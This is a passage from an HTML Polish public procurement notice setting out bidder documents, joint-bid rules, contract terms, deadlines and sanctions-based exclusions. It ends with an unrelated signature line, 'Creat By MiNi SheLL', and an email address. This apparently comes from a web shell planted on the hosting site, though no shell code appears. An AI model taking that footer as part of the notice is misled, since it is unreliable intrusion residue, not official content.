wydane przez jednostkę oceniającą zgodność lub<br/>c) sprawozdania z badań przeprowadzonych przez jednostkę oceniającą zgodność. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Składane wraz z ofertą:<br/>1. Formularz ofertowy sporządzony zgodnie ze wzorem (Załącznik nr 1 do SWZ),<br/>2. Tabela zbiorczego zestawienia kosztów, stanowiący integralną część oferty - Załącznik nr 1A do SWZ,<br/>3. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania (Załącznik nr 2<br/>do SWZ), sporządzone pod rygorem nieważności, w formie elektronicznej (tj.: w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym, złożone przez:<br/>• Wykonawcę,<br/>• każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w przypadku wspólnego ubiegania się o<br/>udzielenie zamówienia),<br/>• każdy z podmiotów udostępniających Wykonawcy zasoby na zasadzie art. 118 ustawy Pzp (o ile Wykonawca polega na<br/>zasobach innych podmiotów).<br/>4. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o spełnieniu warunków udziału<br/>w postępowaniu (Załącznik nr 2A do SWZ), sporządzone pod rygorem nieważności, w formie elektronicznej (tj.: w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym, złożone przez:<br/>• Wykonawcę,<br/>• każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w przypadku wspólnego ubiegania się o<br/>udzielenie zamówienia),<br/>• każdy z podmiotów udostępniających Wykonawcy zasoby na zasadzie art. 118 ustawy Pzp (o ile Wykonawca polega na<br/>zasobach innych podmiotów).<br/>5. (jeżeli dotyczy) oświadczenie, składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy (Załącznik nr 2B do SWZ), złożone przez:<br/>• Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w przypadku wspólnego ubiegania się o udzielenie<br/>zamówienia),<br/>6. (jeżeli dotyczy) Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy, o którym mowa<br/>w rozdziale 8 pkt 3 SWZ (Załącznik nr 3 do SWZ), jeżeli Wykonawca wykazując spełnienie warunków udziału w<br/>postępowaniu polega na zdolnościach lub sytuacji innych podmiotów.<br/>7. (jeżeli dotyczy) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/<br/>podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp jeżeli w imieniu Wykonawcy/podmiotu<br/>udostępniającego zasoby działa osoba/osoby, której umocowanie nie wynika z informacji z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - zgodnie z pkt 2.4 lub 4.2<br/>rozdziału 13 SWZ.<br/>8. (jeżeli dotyczy) Pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia - zgodnie z pkt 2.4 lub 4.2 rozdziału 13 SWZ (jeżeli dotyczy)<br/>9. Wykazanie zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa – zgodnie z treścią rozdziału 13 pkt 3 SWZ.<br/>10. (jeżeli dotyczy) W przypadku oferowania rozwiązań równoważnych Wykonawca składa przedmiotowe środki dowodowe<br/>w szczególności, o których mowa w rozdziale 9 SWZ, udowadniające, że proponowane rozwiązania w równoważnym<br/>stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. Wykonawcy występujący wspólnie (np.<br/>spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 ustawy Pzp zobowiązani są ustanowić pełnomocnika do reprezentowania<br/>Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>2. Pełnomocnictwo musi być opatrzone przez osobę/osoby uprawnioną(-e) do jego udzielenia tj.: zgodnie z formą<br/>reprezentacji każdego z Wykonawców kwalifikowanym podpisem elektronicznym, podpisem zaufanym, lub podpisem<br/>osobistym; przepis pkt. 2.4 powyżej stosuje się.<br/>3. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienia zabezpieczenia należytego wykonania umowy (jeżeli dotyczy).<br/>4. Wykaz dokumentów i oświadczeń składanych wraz z ofertą, w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, został określony w rozdziale 8 lit. A SWZ, a w przypadku podmiotowych środków dowodowych,<br/>składanych na wezwanie Zamawiającego, został określony w rozdziale 8 lit. B SWZ.<br/>5. Zgodnie z art. 117 ust. 3 ustawy Pzp w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji, doświadczenia,<br/>Wykonawcy wspólnie ubiegający się o wykonanie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy<br/>wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>6. W przypadku, o którym mowa w pkt. 4.5 powyżej Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają<br/>poszczególni Wykonawcy (Załącznik 2B do SWZ).<br/>7. Zamawiający będzie żądał, przed zawarciem umowy, kopii umowy regulującej współpracę wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>8. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia określono w projektowanych postanowieniach umowy - załącznik nr<br/>6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę z załącznikami zgodnie z wymaganiami określonymi w SWZ za pośrednictwem Platformy (pod adresem wskazanym w rozdziale 1 SWZ).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych:<br/>1. w art. 108 ust. 1 ustawy Pzp;<br/>2. w art. 109 ust. 1 pkt 4 ustawy Pzp<br/>3. w art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz. U. z 2024 poz. 507) zwana dalej: „Ustawą<br/>o sankcyjną”.<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (tekst jedn. Dz. U. z 2023 r. poz. 1124 ze zmian.) jest<br/>osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę<br/>lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji<br/>w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia<br/>2022 r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 ze zmian.) jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta została uznana za<br/>najkorzystniejszą zobowiązany jest dopełnić następujących formalności:<br/>− uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej<br/>− uprawnienia architekta budowlane do projektowania w specjalności architektonicznej<br/>− uprawnienia inspektora ochrony radiologicznej<br/>− wskazać przedstawicieli Wykonawcy odpowiedzialnych za realizację zamówienia wraz z danymi kontaktowymi, w<br/>szczególności adres poczty elektronicznej, w celu wprowadzenia do treści umowy;<br/>− przedłożyć oryginał lub potwierdzone/ą przez notariusza kopie/ę odpowiednich/odpowiedniego pełnomocnictw/a, jeśli w<br/>imieniu Wykonawcy umowę zawierał będzie pełnomocnik,<br/>− przedłożyć Zamawiającemu kopię umowy regulującej współpracę Wykonawców, jeżeli została wybrana oferta

Creat By MiNi SheLL
Email: jattceo@gmail.com